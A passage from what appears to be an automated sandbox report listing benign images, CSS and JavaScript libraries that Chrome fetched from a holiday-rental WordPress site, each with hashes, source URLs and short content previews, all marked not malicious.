xmp:ModifyDate="2020-05-06T11:54:56+05:00" xmp:MetadataDate="2
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):8862
              Entropy (8bit):7.972341042271182
              Encrypted:false
              SSDEEP:
              MD5:B5EC6CF5CC537A9637D151E6F40632E6
              SHA1:7D49A6D6F870DA858BFB94E47AF06C68C4B0154B
              SHA-256:B9137BC1721FDE8DE827A7C7C01C26C74A281603853B907BE60FAC3D5F23BDB9
              SHA-512:36F2843E23EC7A98AC822CC478395D54C52414BE545101A7C6B50C3B7258594C70620F9DE56E36ADB694A65E8DB08905C5845EE59549E3EABC24DEE0355B9E2F
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4016!3i2657!4i256!2m3!1e0!2sm!3i710461649!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=47667
              Preview:RIFF."..WEBPVP8L."../..?...*.m%.....BjR..w.}k..l....P..#.(.... ..p..(.$ES./:.t.W.`f....J~...K?.E.x......x#...T......J..~.k.O..|IY.....y..c..?...'m~....s..i>..e*....{.n.fs.Mu]v...d...L.;...xq.%.N...mr.l..V...6...g..y.@...K&.....o.......$E..a.......~@`.m#[..Q...O.....".....-...^....!.. ......j^L).q.y.......pi.B..<M..\.c.I_I..NY.$.."......?[....B....@..q.D...b......|.~.!.!.&.2UBj....., y....&..,....>.....}....w. ..w.|.G.d.>\.!......G....#....*s.2#..y }.*If.\3...E../..#.~..O........?.0.'..7..~.)....{...{.[n..Ze.fd...X.p..:..f6....:.r..@N.....T$.|..B....&..!$..o0..m.~...(c.rU+.....y....,....m.......~...3........S2.......v.d6.j....h.7XF1...t....}.:y...8.......{1..*........M.sB... .E!|...0.S.............xJO....^..?|...w.U9^.|.....`7..s....!B.&l.L+.RQt.K....1...A.Yc.y....;.3.G..8r>L.....S.B'........?#v.&.`..gY.IIzA...Y..5.S...?~....:r$....?.........R6g....p..qU...5..*..r.EkJ<.#..........B..|.|".>".f7. ..lf......*X.:......Z#...Q..Z..P.*......,..sBR..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (21108), with CRLF line terminators
              Category:downloaded
              Size (bytes):21240
              Entropy (8bit):5.3517086117664885
              Encrypted:false
              SSDEEP:
              MD5:6E68329E0FB233D62F877159C2549794
              SHA1:4E7A725581ABACF4A8C32ABE77380D0BD062CC84
              SHA-256:403EAC699A61728B8CD0F1BD7728F25FF040C7B495E183DC241F4D78DFB0A22B
              SHA-512:F68702D631E4B953F5700821B164BBF2BDCE72175AE8158A1F8EEE5EEE1A9B964A4DDB80364ACE72A570B65C683408F1827589845139338F0CC60747087614F1
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/includes/libraries/magnific-popup/js/jquery.magnific-popup.min.js?ver=6.6.2
              Preview:/*! Magnific Popup - v1.0.0 - 2015-12-16..* http://dimsemenov.com/plugins/magnific-popup/..* Copyright (c) 2015 Dmitry Semenov; */..!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="Close",i="BeforeClose",j="AfterClose",k="BeforeAppend",l="MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(c,d){b.ev.triggerHandler(o+c,d),b.st.callbacks&&(c=c.charAt(0).toLowerCase()+c.slice(1),b.st.callbacks[c]&&b.st.callbacks[c].apply(b,a.isArray(d)?d:[d]))},z=function(c){return c===g&&b.currTemplate.closeBtn||(b.currTemplate.closeBtn=a(b.st.closeMarkup.replace("%title%",b.st.tClose)),g=
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):5844
              Entropy (8bit):7.9600560923752814
              Encrypted:false
              SSDEEP:
              MD5:9EF5A9BF8C64AEB1D99B11013293D6FF
              SHA1:D2DC0DE4A843956A84CE90ECE44D5240C1DB1E82
              SHA-256:2A29996EDAEDC6E407C9D06F05CF7379EA0314FC4FD9B0E343EF42931963A45A
              SHA-512:4AFA38A8F0415103E4165DD8392086DDC334007F4CAC7D608067D153B9DB9E2F32C877CFB4EBC5DE59D47D09DB342B4E40274F2AAAB8AFCEE857BD6D48B2AA5C
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4019!3i2658!4i256!2m3!1e0!2sm!3i710461637!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=30833
              Preview:RIFF....WEBPVP8L..../..?...8..6x.?...I...l.l..L2.^... ..>w..l%.......B...].?4.j.5...0........w.?......n..\(9...a"...,.)..~.0....c.Q...=|....h,T.~..k...xs...Ml..eu6.sk.e..m{.F....l"....K.s...aK...."..Q....S^.lS..........g...U.ZV..4...j..lK......J.......*.,.j..f.Vw.......W5@.ef..h.....S1S..w5].r..3.nJ.`.hC..^.[..p.q.6MT.'e.Ofn.g.b.u...P=..e..(...&l.?........P........<.N...u........3..G.Ap...(_?..+.*.e.m.N.E...o....A....V.N..le.t..*d..~.B3....{]=..#c]..E;.HU... ..amQ3v$.;....a......G].5....M.0.3.9..../.P...}....#....?w..[G].e?.z6?....../ .....?~".#b...7.y..l...y.g.o....3.3;...IM&..5....yC.}.kj....4....s.5..N.k~*..7o....i.5A..(..p.ip..Hi:.....5.......H^...v$X.......`..../*...1.G...83..3...lC..q.a....Y\.<.>............lscv-+.~G.....[".OCD.......0}.@........C.mv.Az8....O...)....g.?......VNqYi.....v...&.4.@..O....A...8"...M..C.x.D....1|..B.W......Gz.....7..t.'.Gg..f.....Or..ShZ'.B#....H.i./*.s..k..... ...te..nb.?.kJ.A..W..Z...p.n
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):97988
              Entropy (8bit):4.144548082479177
              Encrypted:false
              SSDEEP:
              MD5:19E0B2083CE22BE0D9AC03985630C140
              SHA1:5A83F56F4E3EFFB73AC42ECB31F60530CEF8D7B6
              SHA-256:C3072CECA239B637D2524C31454AD45BB22A024966E6129D23913C6E1B39E33E
              SHA-512:6DF77EB0E04DA208E21444F0542CDE995F9767331B58E3918F2177FFE9CE5A683C35AAB173B1EB85635D329B170D0F471BF531FF9A09BE80ACD88F098353FAAC
              Malicious:false
              Reputation:unknown
              Preview:// ==================================================.// fancyBox v3.2.10.//.// Licensed GPLv3 for open source use.// or fancyBox Commercial License for commercial use.//.// http://fancyapps.com/fancybox/.// Copyright 2017 fancyApps.//.// ==================================================.;(function (window, document, $, undefined) {. 'use strict';.. // If there's no jQuery, fancyBox can't work. // =========================================.. if ( !$ ) {. return;. }.. // Check if fancyBox is already initialized. // ========================================.. if ( $.fn.fancybox ) {.. if ( 'console' in window ) {. console.log( 'fancyBox already initialized' );. }.. return;. }.. // Private default settings. // ========================.. var defaults = {.. // Enable infinite gallery navigation. loop : false,.. // Space around image, ignored if zoomed-in or viewport width is smaller than 800px.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):388
              Entropy (8bit):4.53066914494761
              Encrypted:false
              SSDEEP:
              MD5:0F9090BA31798B5B232D32E6039E7141
              SHA1:124B0D678F75B8A17637148D47F26C16832D359D
              SHA-256:64FD65EB1E8F0B2D639BCC9A6852EEDAD1B188A02A30F412533D996737B3F66F
              SHA-512:BA0E7BF14B1F22F8D28F3437F2E87C9BCF0F7648A3348057EFFFB0FF13C7734F8D00DC1317DDE6E112A89A7DCCFF4E68EDE09FAF329FD0908C9AF973E5F3FB70
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/css/review-gallery.css?ver=2.1.1-02
              Preview:#review_form .gallery-preview {. display: flex;. flex-wrap: wrap;. gap: 10px;.}..#review_form .preview-item img {. max-width: 300px;. width: 100%;. height: auto;.}..ul.hb-review-images{. display: flex;. flex-wrap: wrap;. gap: 10px;. padding: 0;. list-style: none;.}..ul.hb-review-images li img{. max-width: 300px;. width: 100%;. height: auto;.}..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):34185
              Entropy (8bit):5.244206570211264
              Encrypted:false
              SSDEEP:
              MD5:C5592A6FDA4D0B779F56DB2D5DDAC010
              SHA1:1025E4BC01E7793FDFD4033B75B2260280D0D33E
              SHA-256:C6D0D78D73C8618C4C22287FB022469BFC689B5EB6F58523B49C0ECF4C306E2F
              SHA-512:2167695DAE9375885B0A928C5507AEE13853E186ECCE86E7B188F4D226E4C4D18CDEBF49CCCCD6ED79FFC9017D0492AF1D5DA30966CF6A539793B7D191C1F767
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/cookie-law-info/legacy/public/js/cookie-law-info-public.js?ver=3.2.6
              Preview:CLI_ACCEPT_COOKIE_NAME = (typeof CLI_ACCEPT_COOKIE_NAME !== 'undefined' ? CLI_ACCEPT_COOKIE_NAME : 'viewed_cookie_policy');.CLI_PREFERENCE_COOKIE = (typeof CLI_PREFERENCE_COOKIE !== 'undefined' ? CLI_PREFERENCE_COOKIE : 'CookieLawInfoConsent');.CLI_ACCEPT_COOKIE_EXPIRE = (typeof CLI_ACCEPT_COOKIE_EXPIRE !== 'undefined' ? CLI_ACCEPT_COOKIE_EXPIRE : 365);.CLI_COOKIEBAR_AS_POPUP = (typeof CLI_COOKIEBAR_AS_POPUP !== 'undefined' ? CLI_COOKIEBAR_AS_POPUP : false);.var CLI_Cookie = {..set: function (name, value, days) {...var secure = "";...if (true === Boolean(Cli_Data.secure_cookies)) {....secure = ";secure";...}...if (days) {....var date = new Date();....date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));....var expires = "; expires=" + date.toGMTString();...} else {....var expires = "";...}...document.cookie = name + "=" + value + secure + expires + "; path=/";...if (days < 1) {....host_name = window.location.hostname;....document.cookie = name + "=" + value + expires + "; path=/
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (57765)
              Category:downloaded
              Size (bytes):112427
              Entropy (8bit):4.925295015861728
              Encrypted:false
              SSDEEP:
              MD5:319580D7D8944A1A65F635E0D11E5DA5
              SHA1:E23BC18EF1B0F78F7010E3C16E4C5E1F333248BD
              SHA-256:FB3A89CC6347E098063BD15F285BC90411846DDCE6F17812364FEEDAB67A67F5
              SHA-512:743825EAEA11208277528E506C115EC786AB060095AE4250C65A9B02FE9E5CB2AC5AC386532486A2678B9615490CE75BA096A9FD2041200989AD07A726B5D9D0
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2
              Preview:@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio :where(figcaption){margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (16231), with no line terminators
              Category:downloaded
              Size (bytes):16231
              Entropy (8bit):5.222266892020308
              Encrypted:false
              SSDEEP:
              MD5:42EE2075A315B5DFD6AFB42AB2E3FAD7
              SHA1:7EEFB794A7B7B45BB977C9C78177C2B4A7FDDD32
              SHA-256:4A5BA386E1E003497AEE1C03B70DC432E48BABE13AA8E1818F67F9FD63C16D9A
              SHA-512:8856B7797DCFED414699602391D76F7FA7A775FD3A2C769596D9EE2F4C324D9E0F368B018109F0A8CF184FC464F469684BAC19B55E387DA07D5A1583B9E6FFD4
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/dist/js/frontend/hotel-booking-v2.min.js?ver=2.1.1-02
              Preview:(()=>{document.location.href;const e=hotel_settings?.url_page_search;let t=JSON.parse(window.localStorage.getItem("wphb_filter_rooms"))||{},r=!0;const o=document.querySelector(".hotel-booking-search"),n=(e,t)=>{const r=new URL(e);return Object.keys(t).forEach((e=>{r.searchParams.set(e,t[e])})),r},a=()=>{const e=document.querySelector(".wp-hotel-booking-search-rooms .hotel-booking-search form#hb-form-search-page");null!==e&&c(e,t)},c=(e,t,o=!1)=>{const a=document.querySelector(".wp-hotel-booking-search-rooms .hotel-booking-search ul.wphb-skeleton-animation"),c=document.querySelector(".wp-hotel-booking-search-rooms .hotel-booking-search .detail__booking-rooms"),h=document.querySelector(".wp-hotel-booking-search-rooms .sort-by-wrapper .show-number"),p=hotel_settings.wphb_rest_url;if(!p)return;if(0===Object.keys(t).length){const e=new Intl.DateTimeFormat("en-US",{month:"long"}).format,r=new Date,o=e(r)+" "+("0"+r.getDate()).slice(-2)+", "+r.getFullYear(),n=new Date((new Date).getTime()+864
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Unicode text, UTF-8 text, with very long lines (64127)
              Category:dropped
              Size (bytes):73158
              Entropy (8bit):5.296455650745103
              Encrypted:false
              SSDEEP:
              MD5:3A1AD6AC08819C7E552BBFA59C738CA9
              SHA1:E39430A939EFD52E95AA6011DDDDD5052C7F8ACD
              SHA-256:530D40C858588A68F951A7EAFC135277C700F9A6CBC487947C7A670FD312C21F
              SHA-512:347E48E101921EF683423DC78FD96024D282F15E3395B0487C2A014369BD857663168510DB792D18717AA1B5F28A62A8733518864F00454E42B85638C0C31811
              Malicious:false
              Reputation:unknown
              Preview:/*! Select2 4.1.0-rc.0 | https://github.com/select2/select2/blob/master/LICENSE.md */.!function(n){"function"==typeof define&&define.amd?define(["jquery"],n):"object"==typeof module&&module.exports?module.exports=function(e,t){return void 0===t&&(t="undefined"!=typeof window?require("jquery"):require("jquery")(e)),n(t),t}:n(jQuery)}(function(t){var e,n,s,p,r,o,h,f,g,m,y,v,i,a,_,s=((u=t&&t.fn&&t.fn.select2&&t.fn.select2.amd?t.fn.select2.amd:u)&&u.requirejs||(u?n=u:u={},g={},m={},y={},v={},i=Object.prototype.hasOwnProperty,a=[].slice,_=/\.js$/,h=function(e,t){var n,s,i=c(e),r=i[0],t=t[1];return e=i[1],r&&(n=x(r=l(r,t))),r?e=n&&n.normalize?n.normalize(e,(s=t,function(e){return l(e,s)})):l(e,t):(r=(i=c(e=l(e,t)))[0],e=i[1],r&&(n=x(r))),{f:r?r+"!"+e:e,n:e,pr:r,p:n}},f={require:function(e){return w(e)},exports:function(e){var t=g[e];return void 0!==t?t:g[e]={}},module:function(e){return{id:e,uri:"",exports:g[e],config:(t=e,function(){return y&&y.config&&y.config[t]||{}})};}},r=function(e,t,n
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (12876), with no line terminators
              Category:downloaded
              Size (bytes):12876
              Entropy (8bit):5.1179527069320745
              Encrypted:false
              SSDEEP:
              MD5:BCAD7781B3E74DB2565B8424C45232CD
              SHA1:41B0D94434EF667897C06E1184B703064FFCEDA1
              SHA-256:D622534D53D3AC1095AF275F0B30274FCD835785577DF2DDE6D9398E6F7A2C8F
              SHA-512:8BF688AD357079C992136D62AD437795165F22EA1F23919611FCB756D1975D34FE2272819CFCB6B16AA79980997149F253C20334F8AB7BF133E3C91B3F9E98B7
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6
              Preview:.swiper-container{margin-left:auto;margin-right:auto;position:relative;overflow:hidden;z-index:1}.swiper-container .swiper-slide figure{line-height:0}.swiper-container .elementor-lightbox-content-source{display:none}.swiper-container-no-flexbox .swiper-slide{float:left}.swiper-container-vertical>.swiper-wrapper{flex-direction:column}.swiper-wrapper{position:relative;width:100%;height:100%;z-index:1;display:flex;transition-property:transform;box-sizing:content-box}.swiper-container-android .swiper-slide,.swiper-wrapper{transform:translateZ(0)}.swiper-container-multirow>.swiper-wrapper{flex-wrap:wrap}.swiper-container-free-mode>.swiper-wrapper{transition-timing-function:ease-out;margin:0 auto}.swiper-slide{flex-shrink:0;width:100%;height:100%;position:relative}.swiper-container-autoheight,.swiper-container-autoheight .swiper-slide{height:auto}.swiper-container-autoheight .swiper-wrapper{align-items:flex-start;transition-property:transform,height}.swiper-container .swiper-notification{pos
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1707, components 3
              Category:downloaded
              Size (bytes):543845
              Entropy (8bit):7.9723964941571355
              Encrypted:false
              SSDEEP:
              MD5:C813C1B0003CBCD7D20812FE46345ED5
              SHA1:7946F5FDBDC03AD9B4AE62C453010C5AC5A59958
              SHA-256:937C347110B014092FEBC5D849E8628A7FF8D8CE26C29908A179E41C888FE40A
              SHA-512:F64D315429E6A00BCCF51FF009DD95E1924ED8C3CA888D1DC43523DBF456D2AC9B6189D715FACA007A6C854F8C87CB8D398B6631DACFCAF2AB65FC932DE41D78
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/2022/01/2021_4_V_0093-v1-scaled.jpg
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..IKE|...Rb..@."...i;........:P.n)1KEM...R.u.E.&=(.-..0..-.B..`.1R.R....f.....Z.....]J.....&..4Y...:..+X...q2.&).RsWqXJL..&.`!&.....-..E0..Z(L..GZ.....F(.4........(".3@.)1.-....ii)h...I.9.@.-%...-.....%/.E..)z......E'.(...g...i..:.i..u..(......%.h.h.......K..Z(.@...ih..\A./..0..RR....))s....-.Qp.3E...E.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (65319), with CRLF line terminators
              Category:downloaded
              Size (bytes):155764
              Entropy (8bit):5.066642470765085
              Encrypted:false
              SSDEEP:
              MD5:8FE70898895271DDC62823321011273A
              SHA1:60F0159744E3B554A45DA027F9E7FAA992AED71A
              SHA-256:AE576713BC196098F7438DEDE6FF1F835A23291C32B745AD7E6FB6DB809A719B
              SHA-512:A37D9F7728554BB6C241D68303E0F09BD427F061A681CF61BDDDF1DDA40A0C77C10E3E0BF8E58F1D31C1AF14DF7E5941C26EE53B065E35454EA8CDFFB47392EE
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/bootstrap.css?ver=1726496070
              Preview:/*!.. * Bootstrap v4.3.1 (https://getbootstrap.com/).. * Copyright 2011-2019 The Bootstrap Authors.. * Copyright 2011-2019 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-si
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 200 x 211, 8-bit/color RGBA, non-interlaced
              Category:downloaded
              Size (bytes):4575
              Entropy (8bit):7.804308795903339
              Encrypted:false
              SSDEEP:
              MD5:16865B0D613441B7B53A5632FE136365
              SHA1:0FA71B89EC159E2650217AA873F164642504873D
              SHA-256:C418CCEC9DF433E40CE798349C86787F3E5AB9918FE3590043BF0D88093856E5
              SHA-512:A2A46A2AAAD1682BCF46D8E23680520E6CE8B6821A0EF7524F89F55AC53864E752BD5BD3E2BECAEE7B1AC762B6DF876539330048C588CAD6A18C4E68D64B24BB
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/images/icons/patterns/tri-4.png
              Preview:.PNG........IHDR..............I\.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8123eb9b-07c2-9a4c-9488-c51c15428c53" xmpMM:DocumentID="xmp.did:2FD4FD1F90F511EAB1A6C7856720FF9F" xmpMM:InstanceID="xmp.iid:2FD4FD1E90F511EAB1A6C7856720FF9F" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3bd38516-daff-0c47-b102-7f94d33c0808" stRef:documentID="adobe:docid:photoshop:8395f396-3792-d241-9a19-7c0f82d094f9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.WO.....IDATx..{.]U..W.B..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (3637)
              Category:dropped
              Size (bytes):31426
              Entropy (8bit):5.573306734417716
              Encrypted:false
              SSDEEP:
              MD5:D83A5D13D95CF3ED30C9476CE366DED2
              SHA1:58128AC64FAADD00838F8114D133EDF6EE142483
              SHA-256:0C3B2F3484CC9E74AFC6277FA09FC8EFD15E9B2A0AECFB768EC61BEF99A45648
              SHA-512:F9951E2D257BCEDFE7F0BC68E94C01E6D5383A6AE58436A9C0988AF490ADD3A8BC85B0D6346CE77CAB451181893FC566E7E3F6B09F084F07F10975F99267F0C2
              Malicious:false
              Reputation:unknown
              Preview:google.maps.__gjsload__('onion', function(_){var VXa,WXa,XXa,bQ,eQ,dQ,$Xa,aYa,bYa,ZXa,cYa,gQ,dYa,eYa,fYa,iYa,kYa,lYa,nYa,oYa,rYa,tYa,vYa,xYa,zYa,AYa,yYa,lQ,mQ,kQ,nQ,FYa,GYa,HYa,IYa,oQ,JYa,KYa,pQ,RYa,QYa,sQ,WYa,XYa,YYa,VYa,ZYa,aZa,uQ,eZa,fZa,gZa,$Ya,bZa,cZa,hZa,iZa,tQ,rZa,sZa,vZa,uZa;VXa=function(a){a=_.CHa(a);if(!a)return null;var b=new aQ;b=_.Ie(b,1,_.wD(String(_.Qc(_.zh(a.Fg))),0));a=_.Ie(b,2,_.wD(String(_.Qc(_.zh(a.Eg))),0));b=new TXa;a=_.jf(b,aQ,1,a);return _.$b(UXa(a),4)};WXa=function(a,b){_.ch(a.Gg,1,b)};.XXa=function(a,b){_.ch(a.Gg,2,b)};bQ=function(){YXa||(YXa=[_.N,_.M,_.O])};eQ=function(a){_.KG.call(this,a,cQ);dQ(a)};dQ=function(a){_.bG(a,cQ)||(_.aG(a,cQ,{entity:0,jn:1},["div",,1,0,[" ",["div",,1,1,[" ",["div",576,1,2,"Dutch Cheese Cakes"]," "]]," ",["div",,1,3,[" ",["span",576,1,4,"Central Station"]," ",["div",,1,5]," "]]," "]],[],ZXa()),_.bG(a,"t-ZGhYQtxECIs")||_.aG(a,"t-ZGhYQtxECIs",{},["jsl",,1,0," Station is accessible "],[],[["$t","t-ZGhYQtxECIs"]]))};$Xa=function(a){ret
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):13330
              Entropy (8bit):7.979519339932418
              Encrypted:false
              SSDEEP:
              MD5:7D7456B2081D57A3D39453898B66A31E
              SHA1:ED3A9D3FFC5EC325C02A70BD8EDA16D33208F5A2
              SHA-256:F5A810B23D704B01EBB143CD9E3ADA69703FF14BB3D30C0049C4D10166DD9FD2
              SHA-512:6F672092114E632B7C05ABE3F3CC512C5165A652EBF2D32D399F04A1898F5B705A6731D3DAC438938417F627303993F1E659617B76EE37C7BC20B561A07FAF44
              Malicious:false
              Reputation:unknown
              Preview:RIFF.4..WEBPVP8L.3../..?.'. .mU..}7.5.)H@]..w;....U....$#....>H.9...H.m.y..q...j....=....?.x..P?..!B..D.!..........A...H.....zyPF.N.U......${....g.xO..........7$..<~..........[.[.q.|My..x.H/.....k.s^;..DE.I..H..H...VT1.f=...wb..!.|/Lf:...o..q;v2u..d*......Ck.....vv..j'.$.NO.......$.....D..i.Al.....9F.u...<ei.Y=.9f<.s.c....H*.J..=..JRK.........n`S,...q?.#6Y.....\.m...c...=.(=._e....H.Y..w..m.5.O..ja.D6U.qw..ihT.....\s.......`>..D.0.&>M..<[...4c..3..>.X..2G..1B|..L......(..R).R~}......=...A.3M..b.V.;.I...i.z..?]P.{..?1.#.PS.=.Z.i..V......bcs[.hD..........J....Z],.....{....v.@.MYT.y..F.....tu}5U.#.J.e.I..$|..=...He.@5 {UH...n...yi...-.).iU,E.......Z$<..dI..g..j.r3.........w=.o/./{).`JA...>s..V...r.t..v......{').M(..HHa[&.V.....A.q.f.d.6D$.h.X.d..].5Z{........8..cM....."no..$.....e....D{.P.f.......F.lc.`.i*...Z...s.!.6.U.1....P.X.....6}.S...9LA_.l..]...4.......}..%D][gC.#....LH..eU....7x.M......m.x...r.I|2.6......L.......Z..7.d.c..
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):9322
              Entropy (8bit):7.972710707866644
              Encrypted:false
              SSDEEP:
              MD5:13ACC38612CD77326EBA2DA0F5D85FC1
              SHA1:6A1802F491F548C98C782B4CD1E917A5D6965D53
              SHA-256:64FB41DA75E99AB1EBCFED113E040EA00810B8DB3D78AE39F91831EB93CD9574
              SHA-512:9653B2F8BFA628C27E6C59A61301B0B7A37EAA1A9317E58EE40E93DF6ABAA372C305D15FAFF30D01B153C60831B1D1D4C391417B7E09AE1C535BFD35F1BE1341
              Malicious:false
              Reputation:unknown
